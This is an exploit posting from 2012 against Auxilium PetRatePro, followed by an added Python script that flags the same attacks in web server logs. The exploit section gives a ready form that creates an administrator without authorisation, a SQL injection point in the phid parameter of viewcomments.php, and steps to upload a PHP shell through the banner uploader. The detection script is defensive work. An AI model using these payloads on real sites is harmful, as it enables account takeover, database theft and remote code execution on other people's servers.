
Auxilium PetRatePro SQL Injection / Shell Upload

Posted on 17 September 2012

##########################################
[~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
[~] Date: 14/09/2012
[~] Author: DaOne (@LibyanCA)
[~] Software Link: http://www.auxiliumsoftware.com
[~] Google Dork: "N/A"
##########################################

[#] 1-[Remote Add Admin]:

<form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
(Create New Administrator)
Username <input name="username" type="text" id="name" size="20">
Password<input name="upassword" type="text" id="upassword" size="20">
Name<input name="name1" type="text" id="name1" size="20">
Email Address <input name="email" type="text" id="email" size="20">
<input type="submit" value="Create " name="B1">
</form>

[#] 2-[SQL Injection]
viewcomments.php parameter phid
http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]

[#] 3-[Remote File Upload]
Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
and upload your Shell...
will find files here ...
/PetRatePro/banners/shell.php

##########################################
[*] Contact me
www.facebook.com/DaOne.Ly
##########################################
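For defenders triaging an affected install, the three entry points listed above can be looked for in web server access logs. The following is an added example, not part of the original advisory: the log lines are constructed, and the combined log format, the finding labels, and the treatment of phid as a numeric id are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = '''\
198.51.100.7 - - [17/Sep/2012:10:01:02 +0000] "GET /PetRatePro/viewcomments.php?phid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Sep/2012:10:05:40 +0000] "GET /PetRatePro/viewcomments.php?phid=12%27 HTTP/1.1" 200 911 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Sep/2012:10:06:11 +0000] "POST /PetRatePro/admin/createnewadmin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Sep/2012:10:07:30 +0000] "POST /PetRatePro/admin/sitebanners/upload_banners.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Sep/2012:10:07:52 +0000] "GET /PetRatePro/banners/shell.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Sep/2012:10:09:00 +0000] "GET /PetRatePro/banners/summer.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)

def classify(method, target):
    """Return a finding label for one request, or None if nothing stands out."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if path.endswith('/admin/createnewadmin.php') and method == 'POST':
        return 'admin-create-post'        # review every admin creation request
    if path.endswith('/viewcomments.php'):
        # Assumption: phid is a numeric id, so anything else is suspicious.
        values = parse_qs(parts.query, keep_blank_values=True).get('phid', [])
        if any(not re.fullmatch(r'[0-9]+', v) for v in values):
            return 'phid-not-numeric'
    if path.endswith('/admin/sitebanners/upload_banners.php') and method == 'POST':
        return 'banner-upload'            # correlate with new files in banners/
    if '/banners/' in path and SCRIPT_EXT.search(path):
        return 'script-under-banners'     # an image directory should not serve scripts
    return None

def scan(log_text):
    """Return (client_ip, label, status) for every flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        label = classify(method.upper(), target)
        if label:
            findings.append((ip, label, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `script-under-banners` hit with a 200 status is the strongest signal of the three, since it means a script file in the upload directory was actually served.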
